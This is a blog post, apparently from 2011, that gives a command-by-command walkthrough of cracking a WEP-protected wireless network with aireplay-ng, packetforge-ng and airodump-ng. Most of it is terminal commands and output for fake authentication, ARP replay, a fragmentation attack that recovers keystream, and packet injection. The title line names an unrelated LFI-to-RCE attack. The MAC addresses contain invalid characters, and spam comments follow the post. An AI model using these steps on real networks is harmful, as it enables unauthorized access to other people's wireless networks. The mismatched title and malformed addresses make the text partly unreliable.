LFI to RCE via access_log injection

fragmentation attack with aireplay-ng

basically, the program obtains a small amount of keying material from the packet
then attempts to send ARP and/or LLC packets with known content to the access point.
if the packet is successfully echoed back by the access point then a larger amount
of keying information can be obtained from the returned packet.


scenario

ESSID : wireless
BSSID : 00:02:6F:23:2B:67
CLIENT MAC : 00:02:4G:87:22:FG


[o] u need to authenticate with the access point.

root@evilc0de:/home/noge# aireplay-ng -1 6000 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
09:58:55 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10

09:58:55 Sending Authentication Request (Open System)
09:58:55 Authentication successful
09:58:55 Sending Association Request
09:58:55 Association successful :-) (AID: 1)

09:59:10 Sending keep-alive packet
09:59:25 Sending keep-alive packet
09:59:40 Sending keep-alive packet


[o] run standard ARP request replay

root@evilc0de:/home/noge# aireplay-ng -3 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
08:07:58 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
Saving ARP requests in replay_arp-0706-080758.cap
You should also start airodump-ng to capture replies.
728 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

as u can see i got 0 ARP request


[o] fragmentation attack!

root@evilc0de:/home/noge# aireplay-ng -5 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
09:59:00 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
09:59:00 Waiting for a data packet...
Read 432 packets...

Size: 112, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:02:6F:23:2B:67
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:02:4G:87:22:FG

0x0000: 0842 2c00 0002 6f87 11fe 0002 6f55 2bd2 .B,...o.....oU+.
0x0010: 000c 4252 2553 e05c 1398 2200 e7b4 f9fa ..BR%S.\..".....
0x0020: a786 d686 bfd1 8151 5bcf a8cb eac8 a10a .......Q[.......
0x0030: 52a9 49c5 ade4 de32 ef4b 294e c961 7de0 R.I....2.K)N.a}.
0x0040: 95ce afe7 ae32 225e 3af0 73db e7aa 47e4 .....2"^:.s...G.
0x0050: 6053 9a4c 0b8d 985b d9fe c1c3 dfc4 b82e `S.L...[........
0x0060: 82b4 a7f0 31bf 8fc6 dd01 4e77 1c02 0520 ....1.....Nw...

Use this packet ? y

Saving chosen packet in replay_src-0706-095931.cap
09:59:34 Data packet found!
09:59:34 Sending fragmented packet
09:59:34 Got RELAYED packet!!
09:59:34 Trying to get 384 bytes of a keystream
09:59:35 No answer, repeating...
09:59:35 Trying to get 384 bytes of a keystream
09:59:35 Trying a LLC NULL packet
09:59:37 No answer, repeating...
09:59:37 Trying to get 384 bytes of a keystream
09:59:39 No answer, repeating...
09:59:39 Trying to get 384 bytes of a keystream
09:59:39 Trying a LLC NULL packet
09:59:39 Got RELAYED packet!!
09:59:39 Trying to get 1500 bytes of a keystream
09:59:39 Got RELAYED packet!!
Saving keystream in fragment-0706-095939.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream


[o] build u'r packet with packetforge-ng

root@evilc0de:/home/noge# packetforge-ng -0 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG -k 255.255.255.255 -l 255.255.255.255 -y fragment-0706-095939.xor -w privx
Wrote packet to: privx

[o] use privx to capture ARP request

root@evilc0de:/home/noge# aireplay-ng -2 -x 150 -r privx -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG


Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:02:6F:23:2B:67
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:02:4G:87:22:FG

0x0000: 0841 0201 0002 6f55 2bd2 0002 6f87 11fe .A....oU+...o...
0x0010: ffff ffff ffff 8001 3e98 2200 3a8c be0b ........>.".:...
0x0020: 0926 44f8 fe6a c35c d517 3ff1 2a8b 95df .&D..j.\..?.*...
0x0030: 97eb b45d bab9 b71b e777 edc7 8678 f1e7 ...].....w...x..
0x0040: d1b2 68b7 ..h.

Use this packet ? y

Saving chosen packet in replay_src-0706-100037.cap
You should also start airodump-ng to capture replies.

Sent 37888 packets...(150 pps)


[o] ARP request start to showing some result [check standard ARP request replay]

422382 packets (got 103517 ARP requests and 239278 ACKs), sent 125781 packets...(478 pps)


[o] run airodump-ng to capture replies

root@evilc0de:/home/noge# airodump-ng -c 10 --bssid 00:02:6F:23:2B:67 -w wep mon0
CH 10 ][ Elapsed: 20 mins ][ 2011-07-06 10:19

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:02:6F:23:2B:67 -75 90 11337 100296 89 10 54 . WEP WEP OPN wireless

BSSID STATION PWR Rate Lost Packets Probes

00:02:6F:23:2B:67 00:02:4G:87:22:FG 0 36 - 1 1271 216477


[o] crack u'r .cap file to find the key!

Comments

zhie_o said…
trnyata...eh...trnyata...nogay kmbali lg...kwkkwkwk
evilc0de said…
iye niy dah lama ga ngepost lagi.. xixixixixi.. :))
I would like to thnkx for the efforts you have put in writing this web site. I am hoping the same high-grade web site post from you in the upcoming as well. Actually your creative writing abilities has encouraged me to get my own site now. Really the blogging is spreading its wings quickly. Your write up is a good example of it.
I would like to thnkx for the efforts you have put in writing this web site. I am hoping the same high-grade web site post from you in the upcoming as well. Actually your creative writing abilities has encouraged me to get my own site now. Really the blogging is spreading its wings quickly. Your write up is a good example of it.
I really like your writing. Thanks so much, finally a decent website with good information in it.
I have been meaning to write something like this on my website and you have given me an idea. Cheers.